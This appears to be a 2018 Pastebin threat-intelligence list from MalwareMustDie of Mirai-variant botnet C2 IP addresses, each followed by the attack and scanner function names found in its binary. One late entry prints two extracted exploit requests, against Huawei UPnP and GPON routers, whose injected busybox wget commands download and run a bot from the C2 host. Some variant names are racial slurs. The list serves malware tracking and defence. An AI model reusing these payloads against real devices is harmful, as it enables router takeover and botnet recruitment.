Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # This are the list of Mirai C2 and panel with the
- # current setup attack functions hardcoded in the compiled binary
- # collected in July 2018, by:
- # MalwareMustDie, NPO - @unixfreaxjp
- # this list is created by r2's r2pipe of rada.re!
- Jul 1 00:52 C2: 167.99.204.242 type: katrina
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 08:21 C2: 178.128.148.138 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 2 10:45 C2: 46.101.250.158 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 01:45 C2: 46.101.250.158 type: Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 2 07:35 C2: 185.244.25.138 type: iloveniggers69/Omni
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 3 09:01 C2: 217.61.97.186 type: original
- scanner.c
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- Jul 3 09:01 C2: 217.61.97.186 type: kaizen
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- scanner_init
- scanner_kill
- scanner_pid
- scanner_rawpkt
- Jul 3 09:01 C2: 217.61.97.186 type: original
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- scanner_init
- scanner_kill
- scanner_pid
- scanner_rawpkt
- Jul 6 22:53 C2: 217.61.97.186 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 3 05:38 C2: 80.211.87.122 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 21:45 C2: 209.97.138.162 type: neurosis
- attack_method.c
- telnet_scanner.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 7 07:59 C2: 209.97.138.162 type: nigger
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_kill
- scanner_pid
- scanner_rawpkt
- Jul 7 07:59 C2: 209.97.138.162 type: exploit
- ascii scanner.c
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- Jun 30 15:24 C2: 159.65.235.46 type: Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 1 00:24 C2: 159.65.235.46 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 6 00:10 C2: 206.189.163.167 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 7 00:42 C2: 185.244.25.133 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 6 01:03 C2: 217.61.120.199 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 6 02:18 C2: 206.189.209.111 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 04:17 C2: 159.89.230.82 type: Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 01:24 C2: 80.211.89.251 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 5 20:42 C2: 51.15.193.249 type: kek
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 01:17 C2: 80.252.107.183 type: owari
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 10:29 C2: 165.227.115.67 type: AB4g5/Cult
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 4 01:29 C2: 165.227.115.67 type: Cult
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 3 22:34 C2: 165.227.102.171 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 2 19:20 C2: 178.128.248.1 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jun 27 06:43 C2: 167.99.146.93 type: Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 6 00:25 C2: 80.211.41.101 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 12 00:36 C2: 80.211.146.193 type: Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 12 09:36 C2: 80.211.146.193 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 8 06:19 C2: 176.107.130.143 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 8 22:01 C2: 159.65.81.70 type: sora
- attack.c
- attack_app.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_app_http
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_udp_dns
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 2 13:01 C2: 94.177.253.18 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 10 09:12 C2: 51.15.195.195 type: dek
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 12 14:37 C2: 178.128.163.237 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 11 07:22 C2: 178.132.201.154 type: original
- ascii scanner.c
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- scanner_kill
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 11 07:23 C2: 178.132.201.154 type: kaizen
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- scanner_init
- scanner_kill
- scanner_pid
- scanner_rawpkt
- Jul 11 07:23 C2: 178.132.201.154 type: original
- attack_method.c
- attack_method_asyn
- attack_method_cfnull
- attack_method_greip
- attack_method_http
- attack_method_std
- attack_method_tcpack
- attack_method_tcpall
- attack_method_tcpfrag
- attack_method_tcpsyn
- attack_method_tcpusyn
- attack_method_udpgame
- attack_method_udpplain
- scanner_init
- scanner_kill
- scanner_pid
- scanner_rawpkt
- Jul 10 20:21 C2: 80.211.175.27 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 13 14:00 C2: 139.59.2.118 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 11 11:48 C2: 178.128.15.245 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 13 13:41 C2: 80.211.82.44 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 12 09:19 C2: 185.244.25.150 type: AB4g5/Cult
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 10 06:49 C2: 167.99.164.53 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 13 08:31 C2: 94.177.214.233 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 13 09:19 C2: 159.89.189.233 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 13 19:39 C2: 159.89.16.26 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 15 03:51 C2: 178.128.79.94/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 15 12:51 C2: 178.128.79.94 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 16 06:54 C2: 167.99.153.91 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 16 06:56 C2: 178.128.39.135 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 16 03:43 C2: 159.65.196.137 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 15 11:46 C2: 178.132.201.156 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 16 06:23 C2: 178.128.68.128 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 11 14:35 C2: 178.128.42.229 type: sora
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 14 17:48 C2: 204.48.30.214 type: AB4g5/Josho
- attack_method.c
- attack_method_greeth
- attack_method_greip
- attack_method_std
- attack_method_tcpack
- attack_method_tcpstomp
- attack_method_tcpsyn
- attack_method_tcpxmas
- attack_method_udpdns
- attack_method_udpgeneric
- attack_method_udpplain
- attack_method_udpvse
- scanner_init
- scanner_pid
- scanner_rawpkt
- Jul 21 11:38 C2: 104.244.72.82 type: sister "custom"
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- dlink_scanner.c
- gpon_scanner.c
- huawei_scanner.c
- attack_gre_eth
- attack_gre_ip
- attack_tcp_ack
- attack_tcp_stomp
- attack_tcp_syn
- attack_udp_dns
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- dlinkscanner_fake_time
- dlinkscanner_rsck
- dlinkscanner_scanner_init
- dlinkscanner_scanner_kill
- dlinkscanner_scanner_pid
- dlinkscanner_scanner_rawpkt
- dlinkscanner_setup_connection
- gponscanner_fake_time
- gponscanner_rsck
- gponscanner_scanner_init
- gponscanner_scanner_kill
- gponscanner_scanner_pid
- gponscanner_scanner_rawpkt
- gponscanner_setup_connection
- huaweiscanner_fake_time
- huaweiscanner_rsck
- huaweiscanner_scanner_init
- huaweiscanner_scanner_kill
- huaweiscanner_scanner_pid
- huaweiscanner_scanner_rawpkt
- huaweiscanner_setup_connection
- :
- HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.244.72.82 -l /tmp/dgoct -r /huawei; /bin/busybox chmod 777 * /tmp/dgoct; /tmp/dgoct huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n
- HTTP/1.1\r\nUser-Agent: Hello, World\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://104.244.72.82/gpon+-O+/tmp/pyx;sh+/tmp/pyx`&ipv=0\r\n\r\n
- Jul 14 21:52 C2: 46.243.189.109 type: sister
- attack.c
- attack_gre.c
- attack_tcp.c
- attack_udp.c
- attack_gre_eth
- attack_udp_generic
- attack_udp_plain
- attack_udp_vse
- attack_tcp_ack
- attack_tcp_stomp
- attack_udp_dns
- attack_tcp_syn
- attack_gre_ip
- scanner_kill
- scanner_init
- scanner_pid
- scanner_rawpkt
- [EOF] MMD
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement